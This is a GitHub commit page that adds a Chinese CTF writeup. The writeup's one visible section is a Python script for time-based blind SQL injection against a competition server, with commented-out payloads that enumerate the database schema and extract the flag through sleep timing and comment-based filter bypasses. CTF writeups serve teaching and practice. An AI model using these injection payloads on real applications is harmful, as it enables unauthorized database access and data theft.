Skip to content

Commit f74ccbd

Browse files
fengfeng
feng
authored and
feng
committed
commit
1 parent 3af9da4 commit f74ccbd

File tree

87 files changed

+752
-0
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

87 files changed

+752
-0
lines changed

.DS_Store

8 KB
Binary file not shown.

Web/比赛/RCTF2021/Pwn/game/game_docker/._.DS_Store renamed to Web/.DS_Store

4 KB
Binary file not shown.

Web/writeup/2021-金砖系统安全-writeup.md

Lines changed: 49 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,49 @@
1+
# 2021-金砖系统安全-writeup
2+
3+
## 第11题
4+
5+
SQL时间盲注入:
6+
7+
```python
8+
import requests
9+
from time import sleep
10+
url="http://106.14.91.65:8003/index.php"
11+
12+
13+
def charToHex(string):
14+
res = "0x"
15+
for i in string:
16+
res +=str(hex(ord(i))).replace("0x","")
17+
return res
18+
flag='flag{0ca75e4b19583a18e6a0e6517a8b53df}'
19+
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
20+
for i in range(1,100):
21+
for j in "{}0123456789abcdefghijklmnopqrstuvwxyz,-_":
22+
#for j in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{},-_":
23+
24+
#payload="' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},sleep(0.02),1)#".format(i,j)
25+
#payload="' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag233333'),{},1))<{},sleep(0.02),1)#".format(i,j)
26+
#payload="' or if(ascii(substr((select group_concat(flagass233) from flag233333),{},1))<{},sleep(0.02),1)#".format(i,j)
27+
#payload="-1'||if(ascii(substr(database(),{},1))<{},1=1,1=2)#".format(i,j)
28+
#payload="-1'||if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},1=1,1=2)#".format(i,j)
29+
#payload="-1'||if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='words'),{},1))<{},1=1,1=2)#".format(i,j)
30+
#payload="-1'||if(ascii(substr((select group_concat(flag) from `1919810931114514`),{},1))<{},1=1,1=2)#".format(i,j)
31+
#payload = "/**/||case/**/when/**/((select/**/group_concat(table_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x25666c616725)like/**/{})/**/then/**/sleep(0.4)/**/else/**/0.4/**/end#".format(charToHex(flag+j+"%"))
32+
#payload = "/**/||case/**/when/**/((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x61666c414761)like/**/binary/**/{})/**/then/**/sleep(0.4)/**/else/**/0.4/**/end#".format(charToHex(flag+j+"%"))
33+
payload = "/**/||case/**/when/**/((select/**/group_concat(Value)/**/from/**/aflaga)like/**/binary/**/{})/**/then/**/sleep(0.4)/**/else/**/0.5/**/end#".format(charToHex(flag+j+"%"))
34+
35+
#print(payload)
36+
params = {
37+
"a":"\\",
38+
"b":payload
39+
}
40+
try:
41+
r = requests.get(url=url,params=params,timeout=1.2)
42+
except:
43+
flag += j
44+
print(flag)
45+
sleep(0.3)
46+
"admIN"
47+
"Value" "aflaga"
48+
```
49+

Web/writeup/2022-CISCN-初赛-Writeup.assets/17DBBA80038857AC5F89F43E16FC69B8.png

50.6 KB
Loading

Web/writeup/2022-CISCN-初赛-Writeup.assets/image-20220529160200097.png

307 KB
Loading

Web/writeup/2022-CISCN-初赛-Writeup.assets/image-20220529160824370.png

811 KB
Loading

Web/writeup/2022-CISCN-初赛-Writeup.assets/image-20220529160903568.png

694 KB
Loading

Web/writeup/2022-CISCN-初赛-Writeup.assets/image-20220529160917851.png

694 KB
Loading

Web/writeup/2022-CISCN-初赛-Writeup.assets/image-20220529160932714.png

267 KB
Loading

Web/writeup/2022-CISCN-初赛-Writeup.assets/image-20220529161026566.png

267 KB
Loading

0 commit comments

Comments
 (0)